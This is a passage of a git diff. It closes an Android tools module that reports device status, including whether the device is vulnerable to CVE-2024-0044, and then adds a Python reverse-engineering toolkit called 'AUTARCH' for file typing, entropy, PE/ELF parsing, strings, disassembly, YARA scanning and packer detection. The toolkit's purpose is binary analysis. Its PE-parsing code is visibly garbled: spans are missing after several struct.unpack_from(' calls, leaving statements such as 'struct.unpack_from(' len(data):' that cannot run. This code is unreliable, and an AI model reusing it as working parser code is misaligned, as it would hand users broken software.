'?')} (patch: {dev.get('security_patch', '?')})") + print(f" SMS App: {dev.get('default_sms_app', '?')}") + shizuku = status.get('shizuku', {}) + print(f" Shizuku: {'running' if shizuku.get('running') else 'not running'}") + archon = status.get('archon', {}) + print(f" Archon: {'installed' if archon.get('installed') else 'not installed'}") + cve = status.get('cve_2024_0044', {}) + if cve.get('vulnerable'): + print(f" CVE-2024-0044: VULNERABLE") + else: + print(" No device connected") + + +def run(): + get_rcs_tools().run() diff --git a/modules/reverse_eng.py b/modules/reverse_eng.py new file mode 100644 index 0000000..658e63b --- /dev/null +++ b/modules/reverse_eng.py @@ -0,0 +1,1979 @@ +"""AUTARCH Reverse Engineering Toolkit + +Binary analysis, PE/ELF parsing, disassembly, YARA scanning, +hex viewing, packer detection, and Ghidra headless integration. +""" + +DESCRIPTION = "Binary analysis, disassembly & reverse engineering" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "analyze" + +import os +import sys +import re +import math +import json +import struct +import hashlib +import subprocess +import tempfile +from pathlib import Path +from datetime import datetime +from typing import Dict, List, Optional, Any, Tuple + +sys.path.insert(0, str(Path(__file__).parent.parent)) + +try: + from core.paths import get_data_dir, find_tool +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + def find_tool(name, extra_paths=None): + import shutil + return shutil.which(name) + +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + CYAN = BOLD = GREEN = YELLOW = RED = WHITE = DIM = RESET = "" + def clear_screen(): pass + def display_banner(): pass + +# Optional: capstone disassembler +try: + import capstone + HAS_CAPSTONE = True +except ImportError: + HAS_CAPSTONE = False + +# Optional: yara-python +try: + import yara + HAS_YARA = True +except ImportError: + HAS_YARA = False + + +# ── Magic Bytes ────────────────────────────────────────────────────────────── + +MAGIC_BYTES = { + b'\x4d\x5a': 'PE', + b'\x7fELF': 'ELF', + b'\xfe\xed\xfa\xce': 'Mach-O (32-bit)', + b'\xfe\xed\xfa\xcf': 'Mach-O (64-bit)', + b'\xce\xfa\xed\xfe': 'Mach-O (32-bit, reversed)', + b'\xcf\xfa\xed\xfe': 'Mach-O (64-bit, reversed)', + b'\xca\xfe\xba\xbe': 'Mach-O (Universal)', + b'\x50\x4b\x03\x04': 'ZIP/JAR/APK/DOCX', + b'\x50\x4b\x05\x06': 'ZIP (empty)', + b'\x25\x50\x44\x46': 'PDF', + b'\xd0\xcf\x11\xe0': 'OLE2 (DOC/XLS/PPT)', + b'\x89\x50\x4e\x47': 'PNG', + b'\xff\xd8\xff': 'JPEG', + b'\x47\x49\x46\x38': 'GIF', + b'\x1f\x8b': 'GZIP', + b'\x42\x5a\x68': 'BZIP2', + b'\xfd\x37\x7a\x58': 'XZ', + b'\x37\x7a\xbc\xaf': '7-Zip', + b'\x52\x61\x72\x21': 'RAR', + b'\xca\xfe\xba\xbe': 'Java Class / Mach-O Universal', + b'\x7f\x45\x4c\x46': 'ELF', + b'\x23\x21': 'Script (shebang)', + b'\x00\x61\x73\x6d': 'WebAssembly', + b'\xed\xab\xee\xdb': 'RPM', + b'\x21\x3c\x61\x72': 'Debian/AR archive', +} + + +# ── Packer Signatures ─────────────────────────────────────────────────────── + +PACKER_SIGNATURES = { + 'UPX': { + 'section_names': [b'UPX0', b'UPX1', b'UPX2', b'UPX!'], + 'magic': [b'UPX!', b'UPX0', b'\x55\x50\x58'], + 'description': 'Ultimate Packer for Executables', + }, + 'Themida': { + 'section_names': [b'.themida', b'.winlice'], + 'magic': [], + 'description': 'Themida / WinLicense protector', + }, + 'ASPack': { + 'section_names': [b'.aspack', b'.adata'], + 'magic': [b'\x60\xe8\x00\x00\x00\x00\x5d\x81\xed'], + 'description': 'ASPack packer', + }, + 'MPRESS': { + 'section_names': [b'.MPRESS1', b'.MPRESS2'], + 'magic': [], + 'description': 'MPRESS packer', + }, + 'VMProtect': { + 'section_names': [b'.vmp0', b'.vmp1', b'.vmp2'], + 'magic': [], + 'description': 'VMProtect software protection', + }, + 'PECompact': { + 'section_names': [b'PEC2', b'pec1', b'pec2', b'PEC2TO'], + 'magic': [], + 'description': 'PECompact packer', + }, + 'Petite': { + 'section_names': [b'.petite'], + 'magic': [b'\xb8\x00\x00\x00\x00\x66\x9c\x60\x50'], + 'description': 'Petite packer', + }, + 'NSPack': { + 'section_names': [b'.nsp0', b'.nsp1', b'.nsp2', b'nsp0', b'nsp1'], + 'magic': [], + 'description': 'NSPack (North Star) packer', + }, + 'Enigma': { + 'section_names': [b'.enigma1', b'.enigma2'], + 'magic': [], + 'description': 'Enigma Protector', + }, + 'MEW': { + 'section_names': [b'MEW'], + 'magic': [], + 'description': 'MEW packer', + }, +} + + +# ── PE Constants ───────────────────────────────────────────────────────────── + +PE_MACHINE_TYPES = { + 0x0: 'Unknown', + 0x14c: 'x86 (i386)', + 0x166: 'MIPS R4000', + 0x1a2: 'Hitachi SH3', + 0x1a6: 'Hitachi SH4', + 0x1c0: 'ARM', + 0x1c4: 'ARM Thumb-2', + 0x200: 'Intel IA-64', + 0x8664: 'x86-64 (AMD64)', + 0xaa64: 'ARM64 (AArch64)', + 0x5032: 'RISC-V 32-bit', + 0x5064: 'RISC-V 64-bit', +} + +PE_SECTION_FLAGS = { + 0x00000020: 'CODE', + 0x00000040: 'INITIALIZED_DATA', + 0x00000080: 'UNINITIALIZED_DATA', + 0x02000000: 'DISCARDABLE', + 0x04000000: 'NOT_CACHED', + 0x08000000: 'NOT_PAGED', + 0x10000000: 'SHARED', + 0x20000000: 'EXECUTE', + 0x40000000: 'READ', + 0x80000000: 'WRITE', +} + + +# ── ELF Constants ──────────────────────────────────────────────────────────── + +ELF_MACHINE_TYPES = { + 0: 'None', + 2: 'SPARC', + 3: 'x86', + 8: 'MIPS', + 20: 'PowerPC', + 21: 'PowerPC64', + 40: 'ARM', + 43: 'SPARC V9', + 50: 'IA-64', + 62: 'x86-64', + 183: 'AArch64 (ARM64)', + 243: 'RISC-V', + 247: 'eBPF', +} + +ELF_TYPES = {0: 'NONE', 1: 'REL', 2: 'EXEC', 3: 'DYN', 4: 'CORE'} + +ELF_OSABI = { + 0: 'UNIX System V', 1: 'HP-UX', 2: 'NetBSD', 3: 'Linux', + 6: 'Solaris', 7: 'AIX', 8: 'IRIX', 9: 'FreeBSD', 12: 'OpenBSD', +} + +ELF_SH_TYPES = { + 0: 'NULL', 1: 'PROGBITS', 2: 'SYMTAB', 3: 'STRTAB', 4: 'RELA', + 5: 'HASH', 6: 'DYNAMIC', 7: 'NOTE', 8: 'NOBITS', 9: 'REL', + 11: 'DYNSYM', +} + +ELF_PT_TYPES = { + 0: 'NULL', 1: 'LOAD', 2: 'DYNAMIC', 3: 'INTERP', 4: 'NOTE', + 5: 'SHLIB', 6: 'PHDR', 7: 'TLS', + 0x6474e550: 'GNU_EH_FRAME', 0x6474e551: 'GNU_STACK', + 0x6474e552: 'GNU_RELRO', 0x6474e553: 'GNU_PROPERTY', +} + + +# ── ReverseEngineer Class ──────────────────────────────────────────────────── + +class ReverseEngineer: + """Comprehensive binary analysis and reverse engineering toolkit.""" + + _instance = None + + def __init__(self): + data_dir = get_data_dir() if callable(get_data_dir) else get_data_dir + self.storage_dir = Path(str(data_dir)) / 'reverse_eng' + self.yara_rules_dir = self.storage_dir / 'yara_rules' + self.cache_dir = self.storage_dir / 'cache' + self.storage_dir.mkdir(parents=True, exist_ok=True) + self.yara_rules_dir.mkdir(parents=True, exist_ok=True) + self.cache_dir.mkdir(parents=True, exist_ok=True) + self._analysis_cache: Dict[str, Any] = {} + + # ── File Type Detection ────────────────────────────────────────────── + + def get_file_type(self, file_path: str) -> Dict[str, str]: + """Identify file type from magic bytes.""" + p = Path(file_path) + if not p.exists() or not p.is_file(): + return {'type': 'unknown', 'error': 'File not found'} + + try: + with open(p, 'rb') as f: + header = f.read(16) + except Exception as e: + return {'type': 'unknown', 'error': str(e)} + + if len(header) < 2: + return {'type': 'empty', 'description': 'File too small'} + + # Check magic bytes, longest match first + for magic, file_type in sorted(MAGIC_BYTES.items(), key=lambda x: -len(x[0])): + if header[:len(magic)] == magic: + return {'type': file_type, 'magic_hex': magic.hex()} + + # Heuristic: check if text file + try: + with open(p, 'rb') as f: + sample = f.read(8192) + text_chars = set(range(7, 14)) | set(range(32, 127)) | {0} + non_text = sum(1 for b in sample if b not in text_chars) + if non_text / max(len(sample), 1) < 0.05: + return {'type': 'Text', 'description': 'ASCII/UTF-8 text file'} + except Exception: + pass + + return {'type': 'unknown', 'magic_hex': header[:8].hex()} + + # ── Entropy Calculation ────────────────────────────────────────────── + + def calculate_entropy(self, data: bytes) -> float: + """Calculate Shannon entropy of byte data. Returns 0.0 to 8.0.""" + if not data: + return 0.0 + freq = [0] * 256 + for b in data: + freq[b] += 1 + length = len(data) + entropy = 0.0 + for count in freq: + if count > 0: + p = count / length + entropy -= p * math.log2(p) + return round(entropy, 4) + + def section_entropy(self, file_path: str) -> List[Dict[str, Any]]: + """Calculate entropy per section for PE/ELF binaries.""" + ft = self.get_file_type(file_path) + file_type = ft.get('type', '') + + results = [] + if file_type == 'PE': + pe_info = self.parse_pe(file_path) + if 'error' not in pe_info: + with open(file_path, 'rb') as f: + for sec in pe_info.get('sections', []): + offset = sec.get('raw_offset', 0) + size = sec.get('raw_size', 0) + if size > 0 and offset > 0: + f.seek(offset) + data = f.read(size) + ent = self.calculate_entropy(data) + results.append({ + 'name': sec.get('name', ''), + 'offset': offset, + 'size': size, + 'entropy': ent, + 'packed': ent > 7.0, + }) + elif file_type == 'ELF': + elf_info = self.parse_elf(file_path) + if 'error' not in elf_info: + with open(file_path, 'rb') as f: + for sec in elf_info.get('sections', []): + offset = sec.get('offset', 0) + size = sec.get('size', 0) + if size > 0 and offset > 0: + f.seek(offset) + data = f.read(size) + ent = self.calculate_entropy(data) + results.append({ + 'name': sec.get('name', ''), + 'offset': offset, + 'size': size, + 'entropy': ent, + 'packed': ent > 7.0, + }) + return results + + # ── Comprehensive Binary Analysis ──────────────────────────────────── + + def analyze_binary(self, file_path: str) -> Dict[str, Any]: + """Comprehensive binary analysis: type, hashes, entropy, strings, architecture.""" + p = Path(file_path) + if not p.exists() or not p.is_file(): + return {'error': f'File not found: {file_path}'} + + stat = p.stat() + + # Read file data + try: + with open(p, 'rb') as f: + data = f.read() + except Exception as e: + return {'error': f'Cannot read file: {e}'} + + # File type + file_type = self.get_file_type(file_path) + + # Hashes + hashes = { + 'md5': hashlib.md5(data).hexdigest(), + 'sha1': hashlib.sha1(data).hexdigest(), + 'sha256': hashlib.sha256(data).hexdigest(), + } + + # Overall entropy + overall_entropy = self.calculate_entropy(data) + + # Section entropy + sec_entropy = self.section_entropy(file_path) + + # Architecture detection + arch = 'unknown' + ftype = file_type.get('type', '') + if ftype == 'PE': + pe = self.parse_pe(file_path) + arch = pe.get('machine_str', 'unknown') + elif ftype == 'ELF': + elf = self.parse_elf(file_path) + arch = elf.get('machine_str', 'unknown') + + # Extract strings (limited to first 1MB for speed) + sample = data[:1024 * 1024] + strings = self._extract_strings_from_data(sample, min_length=4) + + # Packer detection + packer = self.detect_packer(file_path) + + result = { + 'file': str(p.absolute()), + 'name': p.name, + 'size': stat.st_size, + 'size_human': self._human_size(stat.st_size), + 'modified': datetime.fromtimestamp(stat.st_mtime).isoformat(), + 'created': datetime.fromtimestamp(stat.st_ctime).isoformat(), + 'file_type': file_type, + 'architecture': arch, + 'hashes': hashes, + 'entropy': overall_entropy, + 'entropy_level': 'high' if overall_entropy > 7.0 else ('medium' if overall_entropy > 6.0 else 'low'), + 'section_entropy': sec_entropy, + 'strings_count': len(strings), + 'strings_preview': strings[:100], + 'packer': packer, + } + + # Add imports/exports if applicable + if ftype == 'PE': + result['imports'] = self.get_imports(file_path) + result['exports'] = self.get_exports(file_path) + elif ftype == 'ELF': + result['imports'] = self.get_imports(file_path) + result['exports'] = self.get_exports(file_path) + + # Cache result + self._analysis_cache[file_path] = result + return result + + # ── PE Parsing ─────────────────────────────────────────────────────── + + def parse_pe(self, file_path: str) -> Dict[str, Any]: + """Parse PE (Portable Executable) headers using struct.unpack.""" + p = Path(file_path) + if not p.exists(): + return {'error': 'File not found'} + + try: + with open(p, 'rb') as f: + data = f.read() + except Exception as e: + return {'error': str(e)} + + if len(data) < 64 or data[:2] != b'\x4d\x5a': + return {'error': 'Not a valid PE file (missing MZ header)'} + + # DOS Header + e_lfanew = struct.unpack_from(' len(data): + return {'error': 'Invalid PE offset'} + + # PE Signature + pe_sig = data[e_lfanew:e_lfanew + 4] + if pe_sig != b'PE\x00\x00': + return {'error': 'Invalid PE signature'} + + # COFF Header (20 bytes after PE signature) + coff_offset = e_lfanew + 4 + if coff_offset + 20 > len(data): + return {'error': 'Truncated COFF header'} + + machine, num_sections, time_stamp, sym_table_ptr, num_symbols, \ + opt_header_size, characteristics = struct.unpack_from( + ' len(data): + return {'error': 'Truncated optional header'} + + opt_magic = struct.unpack_from(' len(data): + break + name_raw = data[off:off + 8] + name = name_raw.rstrip(b'\x00').decode('ascii', errors='replace') + vsize, vaddr, raw_size, raw_offset, reloc_ptr, linenum_ptr, \ + num_relocs, num_linenums, chars = struct.unpack_from( + ' Dict[str, Any]: + """Parse ELF (Executable and Linkable Format) headers using struct.unpack.""" + p = Path(file_path) + if not p.exists(): + return {'error': 'File not found'} + + try: + with open(p, 'rb') as f: + data = f.read() + except Exception as e: + return {'error': str(e)} + + if len(data) < 16 or data[:4] != b'\x7fELF': + return {'error': 'Not a valid ELF file'} + + # ELF Identification + ei_class = data[4] # 1=32-bit, 2=64-bit + ei_data = data[5] # 1=little-endian, 2=big-endian + ei_version = data[6] + ei_osabi = data[7] + + is_64 = (ei_class == 2) + endian = '<' if ei_data == 1 else '>' + bits_str = '64-bit' if is_64 else '32-bit' + endian_str = 'Little Endian' if ei_data == 1 else 'Big Endian' + + # ELF Header + if is_64: + if len(data) < 64: + return {'error': 'Truncated ELF64 header'} + e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \ + e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, \ + e_shnum, e_shstrndx = struct.unpack_from( + f'{endian}HHIQQQIHHHHHH', data, 16) + else: + if len(data) < 52: + return {'error': 'Truncated ELF32 header'} + e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \ + e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, \ + e_shnum, e_shstrndx = struct.unpack_from( + f'{endian}HHIIIIIHHHHHH', data, 16) + + machine_str = ELF_MACHINE_TYPES.get(e_machine, f'Unknown ({e_machine})') + type_str = ELF_TYPES.get(e_type, f'Unknown ({e_type})') + osabi_str = ELF_OSABI.get(ei_osabi, f'Unknown ({ei_osabi})') + + # Section Headers + sections = [] + shstrtab_data = b'' + if e_shstrndx < e_shnum and e_shoff > 0: + strtab_off = e_shoff + e_shstrndx * e_shentsize + if is_64 and strtab_off + 64 <= len(data): + sh_offset = struct.unpack_from(f'{endian}Q', data, strtab_off + 24)[0] + sh_size = struct.unpack_from(f'{endian}Q', data, strtab_off + 32)[0] + elif not is_64 and strtab_off + 40 <= len(data): + sh_offset = struct.unpack_from(f'{endian}I', data, strtab_off + 16)[0] + sh_size = struct.unpack_from(f'{endian}I', data, strtab_off + 20)[0] + else: + sh_offset = 0 + sh_size = 0 + if sh_offset + sh_size <= len(data): + shstrtab_data = data[sh_offset:sh_offset + sh_size] + + for i in range(e_shnum): + off = e_shoff + i * e_shentsize + if is_64: + if off + 64 > len(data): + break + sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, \ + sh_link, sh_info, sh_addralign, sh_entsize = struct.unpack_from( + f'{endian}IIQQQQIIQQ', data, off) + else: + if off + 40 > len(data): + break + sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, \ + sh_link, sh_info, sh_addralign, sh_entsize = struct.unpack_from( + f'{endian}IIIIIIIIII', data, off) + + # Resolve section name from string table + name = '' + if sh_name < len(shstrtab_data): + end = shstrtab_data.index(b'\x00', sh_name) if b'\x00' in shstrtab_data[sh_name:] else len(shstrtab_data) + name = shstrtab_data[sh_name:end].decode('ascii', errors='replace') + + type_name = ELF_SH_TYPES.get(sh_type, f'0x{sh_type:x}') + + sections.append({ + 'name': name, + 'type': type_name, + 'type_raw': sh_type, + 'flags': f'0x{sh_flags:x}', + 'address': f'0x{sh_addr:x}', + 'offset': sh_offset, + 'size': sh_size, + 'link': sh_link, + 'info': sh_info, + 'alignment': sh_addralign, + 'entry_size': sh_entsize, + }) + + # Program Headers + program_headers = [] + for i in range(e_phnum): + off = e_phoff + i * e_phentsize + if is_64: + if off + 56 > len(data): + break + p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, \ + p_memsz, p_align = struct.unpack_from( + f'{endian}IIQQQQQQ', data, off) + else: + if off + 32 > len(data): + break + p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, \ + p_flags, p_align = struct.unpack_from( + f'{endian}IIIIIIII', data, off) + + pt_name = ELF_PT_TYPES.get(p_type, f'0x{p_type:x}') + perm_str = '' + perm_str += 'R' if p_flags & 4 else '-' + perm_str += 'W' if p_flags & 2 else '-' + perm_str += 'X' if p_flags & 1 else '-' + + program_headers.append({ + 'type': pt_name, + 'type_raw': p_type, + 'flags': perm_str, + 'offset': f'0x{p_offset:x}', + 'vaddr': f'0x{p_vaddr:x}', + 'paddr': f'0x{p_paddr:x}', + 'file_size': p_filesz, + 'mem_size': p_memsz, + 'alignment': p_align, + }) + + # Dynamic section symbols + dynamic = [] + for sec in sections: + if sec['type'] == 'DYNAMIC' and sec['size'] > 0: + dyn_off = sec['offset'] + dyn_size = sec['size'] + entry_sz = 16 if is_64 else 8 + for j in range(0, dyn_size, entry_sz): + off = dyn_off + j + if is_64 and off + 16 <= len(data): + d_tag, d_val = struct.unpack_from(f'{endian}qQ', data, off) + elif not is_64 and off + 8 <= len(data): + d_tag, d_val = struct.unpack_from(f'{endian}iI', data, off) + else: + break + if d_tag == 0: + break + dynamic.append({'tag': d_tag, 'value': f'0x{d_val:x}'}) + + result = { + 'format': 'ELF', + 'class': bits_str, + 'endianness': endian_str, + 'osabi': osabi_str, + 'type': type_str, + 'type_raw': e_type, + 'machine': f'0x{e_machine:x}', + 'machine_str': machine_str, + 'entry_point': f'0x{e_entry:x}', + 'flags': f'0x{e_flags:x}', + 'num_sections': e_shnum, + 'num_program_headers': e_phnum, + 'sections': sections, + 'program_headers': program_headers, + 'dynamic': dynamic[:50], + } + + return result + + # ── String Extraction ──────────────────────────────────────────────── + + def _extract_strings_from_data(self, data: bytes, min_length: int = 4) -> List[Dict[str, Any]]: + """Extract ASCII and Unicode strings from raw byte data.""" + results = [] + + # ASCII strings + ascii_pattern = re.compile(rb'[\x20-\x7e]{' + str(min_length).encode() + rb',}') + for match in ascii_pattern.finditer(data): + results.append({ + 'offset': match.start(), + 'string': match.group().decode('ascii', errors='replace'), + 'encoding': 'ascii', + }) + + # UTF-16LE strings (common in PE binaries) + i = 0 + while i < len(data) - 1: + # Look for sequences of printable chars with null bytes interleaved + chars = [] + start = i + while i < len(data) - 1: + lo, hi = data[i], data[i + 1] + if hi == 0 and 0x20 <= lo <= 0x7e: + chars.append(chr(lo)) + i += 2 + else: + break + if len(chars) >= min_length: + results.append({ + 'offset': start, + 'string': ''.join(chars), + 'encoding': 'unicode', + }) + else: + i += 1 + + # Sort by offset and deduplicate + results.sort(key=lambda x: x['offset']) + return results + + def extract_strings(self, file_path: str, min_length: int = 4, + encoding: str = 'both') -> List[Dict[str, Any]]: + """Extract printable strings from a binary file.""" + p = Path(file_path) + if not p.exists(): + return [] + + try: + with open(p, 'rb') as f: + data = f.read() + except Exception: + return [] + + results = self._extract_strings_from_data(data, min_length) + + if encoding == 'ascii': + results = [s for s in results if s['encoding'] == 'ascii'] + elif encoding == 'unicode': + results = [s for s in results if s['encoding'] == 'unicode'] + + return results + + # ── Disassembly ────────────────────────────────────────────────────── + + def disassemble(self, data: bytes, arch: str = 'x64', mode: str = '64', + offset: int = 0, count: int = 0) -> List[Dict[str, Any]]: + """Disassemble raw bytes. Uses capstone if available, otherwise objdump.""" + if HAS_CAPSTONE: + return self._disassemble_capstone(data, arch, mode, offset, count) + return self._disassemble_objdump(data, arch, offset, count) + + def _disassemble_capstone(self, data: bytes, arch: str, mode: str, + offset: int, count: int) -> List[Dict[str, Any]]: + """Disassemble using capstone.""" + arch_map = { + 'x86': (capstone.CS_ARCH_X86, capstone.CS_MODE_32), + 'x64': (capstone.CS_ARCH_X86, capstone.CS_MODE_64), + 'arm': (capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM), + 'arm64': (capstone.CS_ARCH_ARM64, capstone.CS_MODE_ARM), + 'mips': (capstone.CS_ARCH_MIPS, capstone.CS_MODE_MIPS32), + } + + cs_arch, cs_mode = arch_map.get(arch.lower(), (capstone.CS_ARCH_X86, capstone.CS_MODE_64)) + md = capstone.Cs(cs_arch, cs_mode) + + instructions = [] + for i, (address, size, mnemonic, op_str) in enumerate(md.disasm_lite(data, offset)): + if count > 0 and i >= count: + break + inst_bytes = data[address - offset:address - offset + size] + instructions.append({ + 'address': f'0x{address:08x}', + 'mnemonic': mnemonic, + 'op_str': op_str, + 'bytes_hex': inst_bytes.hex(), + 'size': size, + }) + + return instructions + + def _disassemble_objdump(self, data: bytes, arch: str, + offset: int, count: int) -> List[Dict[str, Any]]: + """Disassemble using objdump as fallback.""" + objdump = find_tool('objdump') + if not objdump: + return [{'error': 'No disassembler available. Install capstone (pip install capstone) or objdump.'}] + + # Write data to temporary file + with tempfile.NamedTemporaryFile(suffix='.bin', delete=False) as tmp: + tmp.write(data) + tmp_path = tmp.name + + try: + arch_flag = { + 'x86': 'i386', 'x64': 'i386:x86-64', + 'arm': 'arm', 'arm64': 'aarch64', + }.get(arch.lower(), 'i386:x86-64') + + cmd = [objdump, '-D', '-b', 'binary', '-m', arch_flag, tmp_path] + result = subprocess.run(cmd, capture_output=True, text=True, timeout=30) + + instructions = [] + for line in result.stdout.splitlines(): + match = re.match(r'\s*([0-9a-f]+):\s+([0-9a-f ]+?)\s+(\w+)\s*(.*)', line) + if match: + addr_str, bytes_hex, mnemonic, op_str = match.groups() + instructions.append({ + 'address': f'0x{int(addr_str, 16) + offset:08x}', + 'mnemonic': mnemonic.strip(), + 'op_str': op_str.strip(), + 'bytes_hex': bytes_hex.replace(' ', ''), + }) + if count > 0 and len(instructions) >= count: + break + + return instructions + except Exception as e: + return [{'error': f'objdump failed: {e}'}] + finally: + try: + os.unlink(tmp_path) + except Exception: + pass + + def disassemble_file(self, file_path: str, section: str = '.text', + offset: int = 0, count: int = 100) -> List[Dict[str, Any]]: + """Disassemble a specific section of a binary file.""" + p = Path(file_path) + if not p.exists(): + return [{'error': 'File not found'}] + + ft = self.get_file_type(file_path) + ftype = ft.get('type', '') + + arch = 'x64' + sec_offset = offset + sec_size = 0 + + if ftype == 'PE': + pe = self.parse_pe(file_path) + if 'error' in pe: + return [{'error': pe['error']}] + machine = pe.get('machine', '') + if '14c' in machine: + arch = 'x86' + elif 'aa64' in machine: + arch = 'arm64' + elif '1c0' in machine or '1c4' in machine: + arch = 'arm' + + for sec in pe.get('sections', []): + if sec['name'].strip('\x00') == section.strip('.'): + sec_offset = sec['raw_offset'] + offset + sec_size = sec['raw_size'] + break + elif sec['name'].strip('\x00').lower() == section.lstrip('.').lower(): + sec_offset = sec['raw_offset'] + offset + sec_size = sec['raw_size'] + break + + elif ftype == 'ELF': + elf = self.parse_elf(file_path) + if 'error' in elf: + return [{'error': elf['error']}] + machine_str = elf.get('machine_str', '') + if 'x86-64' in machine_str: + arch = 'x64' + elif 'x86' in machine_str: + arch = 'x86' + elif 'ARM64' in machine_str or 'AArch64' in machine_str: + arch = 'arm64' + elif 'ARM' in machine_str: + arch = 'arm' + + for sec in elf.get('sections', []): + if sec['name'] == section: + sec_offset = sec['offset'] + offset + sec_size = sec['size'] + break + + # Read section data + try: + with open(p, 'rb') as f: + if sec_size > 0: + f.seek(sec_offset) + data = f.read(min(sec_size, 0x10000)) + else: + f.seek(sec_offset) + data = f.read(0x10000) + except Exception as e: + return [{'error': f'Cannot read file: {e}'}] + + return self.disassemble(data, arch=arch, offset=sec_offset, count=count) + + # ── YARA Scanning ──────────────────────────────────────────────────── + + def yara_scan(self, file_path: str, rules_path: Optional[str] = None, + rules_string: Optional[str] = None) -> Dict[str, Any]: + """Scan a file with YARA rules.""" + p = Path(file_path) + if not p.exists(): + return {'error': 'File not found', 'matches': []} + + if HAS_YARA: + return self._yara_scan_python(file_path, rules_path, rules_string) + return self._yara_scan_cli(file_path, rules_path, rules_string) + + def _yara_scan_python(self, file_path: str, rules_path: Optional[str], + rules_string: Optional[str]) -> Dict[str, Any]: + """Scan using yara-python library.""" + try: + if rules_string: + rules = yara.compile(source=rules_string) + elif rules_path: + rules = yara.compile(filepath=rules_path) + else: + # Use all rules in yara_rules directory + rule_files = list(self.yara_rules_dir.glob('*.yar')) + \ + list(self.yara_rules_dir.glob('*.yara')) + if not rule_files: + return {'error': 'No YARA rules found', 'matches': []} + sources = {} + for rf in rule_files: + ns = rf.stem + sources[ns] = str(rf) + rules = yara.compile(filepaths=sources) + + matches = rules.match(file_path) + results = [] + for match in matches: + strings_found = [] + for string_match in match.strings: + for instance in string_match.instances: + strings_found.append({ + 'offset': instance.offset, + 'identifier': string_match.identifier, + 'data': instance.matched_data.hex() if len(instance.matched_data) <= 64 else instance.matched_data[:64].hex() + '...', + }) + results.append({ + 'rule': match.rule, + 'namespace': match.namespace, + 'tags': list(match.tags), + 'meta': dict(match.meta) if match.meta else {}, + 'strings': strings_found, + }) + + return {'matches': results, 'total': len(results), 'engine': 'yara-python'} + + except Exception as e: + return {'error': str(e), 'matches': []} + + def _yara_scan_cli(self, file_path: str, rules_path: Optional[str], + rules_string: Optional[str]) -> Dict[str, Any]: + """Scan using yara CLI tool as fallback.""" + yara_bin = find_tool('yara') + if not yara_bin: + return {'error': 'YARA not available. Install yara-python (pip install yara-python) or yara CLI.', 'matches': []} + + try: + if rules_string: + with tempfile.NamedTemporaryFile(suffix='.yar', mode='w', delete=False) as tmp: + tmp.write(rules_string) + tmp_rules = tmp.name + rules_file = tmp_rules + elif rules_path: + rules_file = rules_path + tmp_rules = None + else: + rule_files = list(self.yara_rules_dir.glob('*.yar')) + \ + list(self.yara_rules_dir.glob('*.yara')) + if not rule_files: + return {'error': 'No YARA rules found', 'matches': []} + rules_file = str(rule_files[0]) + tmp_rules = None + + cmd = [yara_bin, '-s', rules_file, file_path] + result = subprocess.run(cmd, capture_output=True, text=True, timeout=60) + + matches = [] + current_rule = None + for line in result.stdout.splitlines(): + rule_match = re.match(r'^(\S+)\s+\S+$', line) + if rule_match and ':' not in line: + current_rule = {'rule': rule_match.group(1), 'strings': []} + matches.append(current_rule) + elif current_rule and ':' in line: + parts = line.strip().split(':', 2) + if len(parts) >= 3: + current_rule['strings'].append({ + 'offset': int(parts[0], 0) if parts[0].strip() else 0, + 'identifier': parts[1].strip(), + 'data': parts[2].strip(), + }) + + if tmp_rules: + os.unlink(tmp_rules) + + return {'matches': matches, 'total': len(matches), 'engine': 'yara-cli'} + + except Exception as e: + return {'error': str(e), 'matches': []} + + def list_yara_rules(self) -> List[Dict[str, str]]: + """List available YARA rule files.""" + rules = [] + for ext in ('*.yar', '*.yara'): + for f in self.yara_rules_dir.glob(ext): + stat = f.stat() + rules.append({ + 'name': f.name, + 'path': str(f), + 'size': stat.st_size, + 'modified': datetime.fromtimestamp(stat.st_mtime).isoformat(), + }) + return sorted(rules, key=lambda x: x['name']) + + # ── Packer Detection ───────────────────────────────────────────────── + + def detect_packer(self, file_path: str) -> Dict[str, Any]: + """Detect common executable packers.""" + p = Path(file_path) + if not p.exists(): + return {'detected': False, 'error': 'File not found'} + + try: + with open(p, 'rb') as f: + data = f.read() + except Exception as e: + return {'detected': False, 'error': str(e)} + + ft = self.get_file_type(file_path) + detections = [] + + # Check magic byte signatures in file body + for packer, sig_info in PACKER_SIGNATURES.items(): + score = 0 + evidence = [] + + # Check for magic byte patterns + for pattern in sig_info.get('magic', []): + idx = data.find(pattern) + if idx != -1: + score += 40 + evidence.append(f'Magic pattern at offset 0x{idx:x}') + + # Check section names (for PE files) + if ft.get('type') == 'PE': + pe = self.parse_pe(file_path) + if 'error' not in pe: + for sec in pe.get('sections', []): + sec_name = sec['name'].encode('ascii', errors='ignore') + for packer_sec in sig_info.get('section_names', []): + if sec_name.rstrip(b'\x00').startswith(packer_sec.rstrip(b'\x00')): + score += 50 + evidence.append(f'Section name: {sec["name"]}') + + if score > 0: + detections.append({ + 'packer': packer, + 'confidence': min(score, 100), + 'description': sig_info.get('description', ''), + 'evidence': evidence, + }) + + # Heuristic checks + overall_entropy = self.calculate_entropy(data) + if overall_entropy > 7.2: + detections.append({ + 'packer': 'Unknown (high entropy)', + 'confidence': 60, + 'description': f'High overall entropy ({overall_entropy:.2f}) suggests packing or encryption', + 'evidence': [f'Entropy: {overall_entropy:.4f}'], + }) + + # Check for small code section with high entropy (common in packed binaries) + if ft.get('type') == 'PE': + sec_ent = self.section_entropy(file_path) + high_ent_sections = [s for s in sec_ent if s.get('entropy', 0) > 7.0] + if high_ent_sections and not detections: + names = ', '.join(s['name'] for s in high_ent_sections) + detections.append({ + 'packer': 'Unknown (packed sections)', + 'confidence': 50, + 'description': f'High entropy sections detected: {names}', + 'evidence': [f'{s["name"]}: entropy {s["entropy"]:.2f}' for s in high_ent_sections], + }) + + # Sort by confidence + detections.sort(key=lambda x: -x['confidence']) + + return { + 'detected': len(detections) > 0, + 'detections': detections, + 'overall_entropy': overall_entropy if 'overall_entropy' in dir() else self.calculate_entropy(data), + } + + # 